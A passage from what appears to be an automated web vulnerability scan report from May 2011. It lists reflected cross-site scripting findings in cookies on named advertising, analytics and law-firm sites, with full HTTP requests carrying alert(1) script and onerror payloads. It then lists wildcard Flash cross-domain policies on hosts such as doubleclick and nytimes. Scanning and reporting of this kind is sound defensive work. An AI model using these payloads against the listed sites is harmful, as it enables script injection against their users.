Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eced85d84f5e; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 166

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C780608<img src=a onerror=alert(1)>ced85d84f5e","ip":"173.193.214.243"}})

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bc53c<script>alert(1)</script>7938f70db0c was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&jsref=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2F&rnd=1305203804180 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 12:36:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c
userid:
</div>
...[SNIP]...

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 297a7"><script>alert(1)</script>a42cb4459e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7"><script>alert(1)</script>a42cb4459e; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2026
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:22 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7"><script>alert(1)</script>a42cb4459e&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9297a7">
...[SNIP]...

4.189. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d3e"><script>alert(1)</script>0bc9f2cc5ef was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9f6d3e"><script>alert(1)</script>0bc9f2cc5ef; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2030
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:23 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9f6d3e"><script>alert(1)</script>0bc9f2cc5ef&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

4.190. http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /bloomberg/trc/2/json

Issue detail

The value of the taboola_user_id cookie is copied into the HTML document as plain text between tags. The payload c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63 was submitted in the taboola_user_id cookie. This input was echoed as c2917<img src=a onerror=alert(1)>7feb297df63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bloomberg/trc/2/json?publisher=bloomberg&pv=2&list-size=9&list-id=rbox-t2v&id=237&uim=horizontal-t2v&intent=s&uip=horizontal-t2v&item-id=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&item-type=text&item-url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&page-id=8b30818aaf47422a6a90e7b9a6ea55e93a6ee14a&cv=4-6-15-45512-2660204&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:15 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id="d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63";Path=/;Expires=Fri, 11-May-12 11:39:15 GMT
Set-Cookie: taboola_session_id="v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355";Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:39:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 7365

trc_json_response =
{"trc":{"req":"46ab7eb1276e8dc36cb3699da961992a","session-id":"bb2bb5149baf45530a5e69614e17e0c0","session-data":"v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355","user-id":"d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>
...[SNIP]...

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The value of the PCUSERNAME cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af was submitted in the PCUSERNAME cookie. This input was echoed as b051f"><img src=a onerror=alert(1)>f07a5d839af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<input type="text" name="pcusername" id="pcusername" value="b051f"><img src=a onerror=alert(1)>f07a5d839af" onblur="if(this.value.length == 0){this.value='Email Address'};" onfocus="if(this.value=='Email Address'){this.value=''};" class="required email" alias="Username" style="width:94%;">
...[SNIP]...

5. Flash cross-domain policy
There are 27 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://ad.us.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.us.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://apps.shareholder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.shareholder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.shareholder.com

Response

HTTP/1.1 200 OK
Content-Length: 96
Content-Type: text/xml
Content-Location: http://apps.shareholder.com/crossdomain.xml
Last-Modified: Tue, 23 Oct 2007 19:01:53 GMT
Accept-Ranges: bytes
ETag: "dd25e02ca715c81:caff3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:07:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.4. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.5. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.6. http://by.optimost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ds.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 11:03:34 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.8. http://engine.cmmeglobal.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://engine.cmmeglobal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: engine.cmmeglobal.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"208-1304684854000"
Last-Modified: Fri, 06 May 2011 12:27:34 GMT
Content-Type: application/xml
Content-Length: 208
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443,8080"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain
...[SNIP]...

5.9. http://feeds.feedburner.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.feedburner.com

Response

HTTP/1.0 200 OK
Expires: Fri, 13 May 2011 10:57:47 GMT
Date: Thu, 12 May 2011 10:57:47 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.10. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.11. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.12. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 11:04:08 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.13. http://wt.o.nytimes.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wt.o.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wt.o.nytimes.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:82c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:04:37 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.14. http://add.my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 10:57:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.15. http://dealbook.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dealbook.nytimes.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:54 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 17:05:31 GMT
ETag: "100a4d-169-4a303147fecc0"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
